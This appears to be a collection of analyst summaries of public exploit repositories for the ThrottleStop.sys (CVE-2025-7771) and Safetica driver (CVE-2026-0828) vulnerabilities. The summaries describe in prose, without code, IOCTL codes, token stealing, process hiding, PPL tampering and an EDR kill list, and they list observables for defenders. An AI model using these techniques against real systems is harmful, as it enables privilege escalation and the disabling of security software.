Arbitrary physical memory read/write in ThrottleStop.sys

This repository is a compact Windows local privilege escalation proof-of-concept for CVE-2025-7771 affecting the ThrottleStop.sys driver. The repo contains only two files: a README describing the vulnerability and exploitation strategy, and a single C++ source file implementing the exploit. The exploit is not part of a larger framework. Core capability: the code abuses two vulnerable device IOCTLs exposed by the driver (0x80006498 read and 0x8000649C write) to perform arbitrary physical memory access from an administrator process. It opens the device \\.\ThrottleStop, verifies read access, then uses NtQuerySystemInformation with the Superfetch information class to build a virtual-to-physical translation map. It also obtains the running kernel base, resolves the PsInitialSystemProcess symbol from ntoskrnl.exe, translates that kernel virtual address to a physical address, and reads the SYSTEM process EPROCESS pointer. From there, the exploit performs classic token stealing: it reads the SYSTEM token from the EPROCESS Token field, walks ActiveProcessLinks to find the current process EPROCESS, preserves the low EX_FAST_REF refcount bits, overwrites the current process token with the SYSTEM token via physical memory write, verifies the write, and finally launches C:\Windows\System32\cmd.exe to obtain a SYSTEM shell. Repository structure is minimal and purpose-built: README.md documents the vulnerability, tested Windows versions, required offsets, and exploitation steps; exploit.cpp contains the full implementation including driver I/O helpers, privilege adjustment, Superfetch query structures, virtual-to-physical mapping logic, kernel symbol resolution, EPROCESS traversal, token overwrite, and shell spawning. This is a real exploit rather than a detector, and its maturity is operational because it contains a complete hardcoded privilege-escalation chain and payload outcome (spawn SYSTEM cmd.exe), but it is not generalized into a reusable framework.

This repository is a small Windows BYOVD-focused project with 11 files: one C source file, one C header, and supporting Markdown documentation. Despite README claims that it is only safe reconnaissance, the actual code in src/0xPoC.c is an operational local exploit for Safetica ProcessMonitorDriver.sys (CVE-2026-0828). The program opens the device \\.\STProcessMonitorDriver, enumerates running processes via Toolhelp32 APIs, compares process names against a hardcoded security-product target list from src/0xtargets.h, and for each match sends DeviceIoControl with IOCTL 0xB822200C and a 64-bit PID. Successful execution results in kernel-assisted termination of targeted AV/EDR processes. Repository structure: src/0xPoC.c is the main exploit entry point; src/0xtargets.h contains the hardcoded kill list (Defender, CrowdStrike, SentinelOne, Carbon Black, Cylance, McAfee, Symantec/Norton, Kaspersky, ESET, Bitdefender, Sophos, Malwarebytes, Safetica, etc.). The remaining files are documentation: README.md describes BYOVD research themes; drivers/0xhashes.md lists hashes, device symlink, and IOCTL details for Safetica; research/0xsafetica-cve-2026-0828.md and research/0xthrottlestop-medusalocker.md summarize two vulnerable-driver cases; docs/0xmitigations.md provides defensive guidance. Main exploit capability: local post-compromise abuse of a vulnerable signed Windows driver to kill protected or security-relevant processes. There is no network communication, persistence, or shell payload. The exploit is dependent on the vulnerable driver already being present and started as a service. The code is straightforward and hardcoded rather than modular, so OPERATIONAL is the best maturity fit rather than WEAPONIZED.

Repository purpose: BYOVD research focused on Windows vulnerable signed drivers, with documentation plus a working user-mode PoC that abuses Safetica’s ProcessMonitorDriver.sys (CVE-2026-0828) to terminate processes via a vulnerable IOCTL. Structure (11 files): - Documentation-heavy: README.md, SECURITY.md, docs/0xmitigations.md (defensive guidance), research/*.md (case studies/patterns), drivers/0xhashes.md (hashes and sources for ProcessMonitorDriver.sys). - Code: src/0xPoC.c (main program) and src/0xtargets.h (hardcoded list of security product process names). Main exploit capability (src/0xPoC.c): - Opens the device interface `\\.\STProcessMonitorDriver` with read/write access. - Enumerates processes using Toolhelp32 APIs (CreateToolhelp32Snapshot / Process32First/Next). - For each process whose name matches the list in 0xtargets.h (Defender, CrowdStrike, SentinelOne, etc.), sends `DeviceIoControl` with IOCTL `0xB822200C` and an 8-byte PID (UINT64). - Reports per-target success/failure and totals. This is an AV/EDR “kill” primitive implemented through a vulnerable driver (BYOVD), not merely reconnaissance. Targeting notes: - CVE-2026-0828: Safetica ProcessMonitorDriver.sys, versions 10.5.75.0 and 11.11.4.0; unprivileged IOCTL path allows arbitrary process termination. - CVE-2025-7771: ThrottleStop.sys is discussed in research notes only (no code in repo for that chain), including device `\\.\ThrottleStop` and example IOCTLs in narrative. Notable observables for defenders: - Device name: `\\.\STProcessMonitorDriver` (and referenced `\\.\ThrottleStop`). - IOCTL: `0xB822200C` used for termination. - Process target list in src/0xtargets.h can be used as an indicator of intent (EDR/AV neutralization). Sanity: Despite README claims of “zero working exploits,” the included C program does implement an operational IOCTL-based process termination routine against the Safetica driver, contingent on the vulnerable driver being present and loaded.

Repository is a Rust-based local Windows kernel exploit app for CVE-2025-7771. It bundles a vulnerable kernel driver (referenced in README as data.rs; imported as src/data module) and uses it to obtain arbitrary kernel memory read/write. Core flow (src/main.rs): 1) Generate random service/driver name. 2) Drop embedded vulnerable driver bytes to %TEMP%\\<name>.sys (utils::drop_vulnerable_driver). 3) Create and start a kernel-driver service (service.rs wrapper around SCM APIs). 4) Open the device \\??\\<service_name> (exploit.rs) and build a MemoryMap (spf.rs) to translate virtual->physical addresses. 5) Demonstrate primitive by resolving ntoskrnl base (nt.rs via NtQuerySystemInformation(SystemModuleInformation)) and parsing ntoskrnl.exe exports (nt.rs + pe.rs + filemap.rs). It then reads 4 bytes from MmGetSystemRoutineAddress and patches its first 3 bytes with 31 C0 C3. 6) Stop and delete the driver service and exit. Key exploit capability (src/exploit.rs): - Implements arbitrary kernel read/write by translating a target virtual address to a physical address (spf::MemoryMap::translate), then invoking vulnerable driver IOCTLs to map that physical memory into user space (IOCTL 0x8000645C) and unmap it (0x80006460). Data is copied with ptr::copy_nonoverlapping. Supporting modules: - src/spf.rs: Superfetch/PFN-query based VA->PA translation (builds a HashMap of virtual page -> physical page). Attempts to enable SE_PROF_SINGLE_PROCESS_PRIVILEGE and SE_DEBUG_PRIVILEGE. - src/service.rs: Service Control Manager wrapper to create/start/stop/delete the kernel driver service. - src/filemap.rs: Win32 file mapping wrapper used to map ntoskrnl.exe as an image. - src/nt.rs: NT helpers: privilege adjustment declarations, NtQuerySystemInformation usage, kernel base discovery, and export resolution. - src/pe.rs: PE structure/constants for parsing exports. No network IOCs are present; all targeting is local via Windows device handle/IOCTLs and local file paths.

Repository purpose: a Windows local PoC for CVE-2025-7771 targeting the ThrottleStop.sys kernel driver. The exploit opens the device \\.\ThrottleStop and uses two hardcoded IOCTLs to achieve arbitrary physical memory read (0x80006498) and write (0x8000649C). To make those primitives usable against kernel virtual addresses, it embeds a C++ “Superfetch” helper (compiled via build.rs into a static library) that snapshots the system memory map using NtQuerySystemInformation(SystemSuperfetchInformation=79) and PFN queries, caching translations from virtual page addresses to physical addresses. Main capabilities implemented: - Arbitrary physical memory read/write (8-byte reads; writes chunked/padded to 8 bytes via BreakBuffer). - Kernel symbol resolution: enumerates loaded kernel drivers to get the kernel base VA (EnumDeviceDrivers), then loads ntoskrnl.exe in userland and resolves PsInitialSystemProcess via GetProcAddress to compute its kernel VA. - EPROCESS discovery: reads PsInitialSystemProcess to obtain the System EPROCESS pointer, then walks the ActiveProcessLinks list to find a target process by PID. - Process “protection” toggling: writes a single byte at EPROCESS+Protection (offset 0x87A). The PoC sets 0x61 (PPL-like) for protect and 0x00 for unprotect. - Process hiding/unhiding: DKOM-style unlink/relink by rewriting LIST_ENTRY pointers in ActiveProcessLinks. Unhide requires the caller to provide the hidden process’s EPROCESS address. Repository structure: - Rust core: src/main.rs (CLI entry), src/utils.rs (clap subcommands), src/driver.rs (device open + IOCTL read/write), src/kernel.rs (kernel base + symbol offset), src/eprocess.rs (process enumeration + EPROCESS manipulation), src/superfetch.rs (FFI bindings). - C++ helper: superfetch/superfetch.h + nt.h implement Superfetch PFN/memory range querying and VA->PA translation; superfetch/wrapper.cpp exposes C ABI wrappers used by Rust. Operational notes/assumptions: - This is a local exploit/PoC (not networked). It requires administrative rights to load/start the vulnerable driver service and to perform the Superfetch privilege adjustments. - The EPROCESS offsets are hardcoded and therefore Windows-build dependent; reliability will vary across versions. - No reverse shell or remote payload is included; the delivered effect is kernel memory manipulation enabling stealth (hide) and process protection changes.

This repository is a proof-of-concept (PoC) exploit for CVE-2025-7771, targeting a vulnerability in the ThrottleStop driver on Windows Server 2022. The exploit leverages the driver's arbitrary physical memory read/write IOCTLs to manipulate kernel memory, specifically the EPROCESS structure of any process, in order to change its Protected Process Light (PPL) protection level. The codebase is written in C and structured as a Visual Studio project, with main logic in 'main.c', memory manipulation in 'exploit.c', process structure handling in 'eprocess.c' and 'ppl.c', and virtual-to-physical address translation in 'vtop.c'. The exploit requires the vulnerable driver to be loaded and administrator privileges. The main entry point is 'main.c', which parses command-line arguments, opens the driver, builds a memory map, and invokes the core exploit functionality. The exploit is operational as a PoC and demonstrates local privilege escalation by allowing arbitrary modification of process protection levels, effectively bypassing Windows process security boundaries.

This repository is a proof-of-concept (POC) exploit for CVE-2025-7771, a local privilege escalation vulnerability in the ThrottleStop.sys driver (version 3.0.0.0) on Windows. The exploit demonstrates how to leverage the driver's exposed IOCTLs to perform arbitrary physical memory reads and writes from user mode, without any access control. The codebase consists of C++ source and header files, with the main logic in 'Entry.cpp' and driver interaction in 'Driver/Driver.h'. The exploit uses the Superfetch technique (implemented in 'Superfetch/Superfetch.h' and 'Superfetch/nt.h') to translate kernel virtual addresses to physical addresses, which are then accessed via DeviceIoControl calls to the driver. The main attack vector is local: an attacker must execute code on the target system with sufficient privileges to open a handle to the driver. The only fingerprintable endpoint is the device file '\\.\ThrottleStop'. The exploit can be used to read or modify any physical memory, enabling kernel code modification, disabling security features, or escalating privileges. The repository is structured as a Visual Studio C++ project, with clear separation between driver communication, memory translation, and the main exploit logic.

This repository contains a functional exploit for CVE-2025-7771, targeting the ThrottleStop driver on Windows. The exploit leverages the driver's capabilities to read and write physical memory, allowing a user-mode process to invoke arbitrary kernel-mode functions. The main entry point is 'main.cpp', which demonstrates creating a ThrottleStop instance, resolving kernel base addresses, and calling the kernel function 'DbgPrint' from user mode. The core logic is implemented in 'throttlestop/throttlestop.cpp' and 'throttlestop/throttlestop.h', which provide methods for interacting with the driver, resolving kernel exports, and patching kernel memory to redirect execution flow. The exploit requires the ThrottleStop driver to be present and accessible, and it interacts with the driver via the device interface '\\.\ThrottleStop'. The repository is well-structured, with separate components for service management, memory mapping, and kernel interaction. The exploit demonstrates operational maturity, providing a working method for kernel code execution from user mode, which can be leveraged for privilege escalation or further exploitation.

This repository is a proof-of-concept (PoC) exploit for CVE-2025-7771, targeting the ThrottleStop driver on Windows systems. The exploit leverages several unprotected IOCTLs exposed by the driver to perform arbitrary physical memory and I/O port read/write operations from user mode. The main entry point is 'src/Main.c', which checks for administrative privileges, opens a handle to the ThrottleStop device (\\.\ThrottleStop), and demonstrates reading the UniqueProcessId from the EPROCESS structure of the System process. It also offers the option to force a system restart by writing to I/O port 0xCF9. The exploit includes code for translating virtual to physical addresses using undocumented Superfetch APIs (src/vtop.c), and for resolving EPROCESS structures (src/EProcess.c). The IOCTL codes and their purposes are well documented in the README and headers. The exploit is intended for research and demonstration purposes, and requires the vulnerable driver to be loaded and accessible. No network endpoints are involved; the attack vector is local privilege escalation via direct device access.

This repository provides a working local privilege escalation exploit for CVE-2025-7771, a vulnerability in the ThrottleStop.sys driver by TechPowerUp. The vulnerability arises from exposed IOCTL interfaces (0x80006498 for reading and 0x8000649C for writing) that allow unprivileged users to map and manipulate arbitrary physical memory via MmMapIoSpace. The exploit is implemented in C++ and consists of a usermode application (Entry.cpp) and a driver communication class (Driver.h). The MemoryDriver class opens a handle to the device (\\.\ThrottleStop), enumerates processes, and performs physical memory operations using DeviceIoControl. The exploit demonstrates reading and writing to physical memory, targeting a process (e.g., notepad.exe), and restoring original values. The repository includes build instructions, usage guidance, and references to advisories and analyses. The exploit requires the vulnerable driver to be installed and running, and administrator privileges to execute. The main attack vector is local, and the primary fingerprintable endpoint is the device file \\.\ThrottleStop. The code is operational and can be used to escalate privileges or execute arbitrary code in kernel context on affected Windows systems.

This repository contains a working local privilege escalation exploit for CVE-2025-7771, targeting the ThrottleStop.sys driver (version 3.0.0.0) on Windows 10 and 11 x64 systems. The exploit is implemented in a single C++ file (exploit.cpp) and leverages insecure IOCTLs exposed by the driver to perform arbitrary kernel memory read/write via MmMapIoSpace. The exploit disables security features (ETW, AMSI), attempts to patch the kernel for privilege escalation, steals the SYSTEM token, and spawns a new SYSTEM shell (cmd.exe by default) using process hollowing for stealth. The README provides detailed vulnerability information, compilation instructions, and mitigation advice. The main attack vector is local, requiring code execution on the target system. The only fingerprintable endpoints are the device object (\\Device\\ThrottleStop) and the default SYSTEM shell path (C:\Windows\System32\cmd.exe). The exploit is operational and suitable for use in controlled testing environments.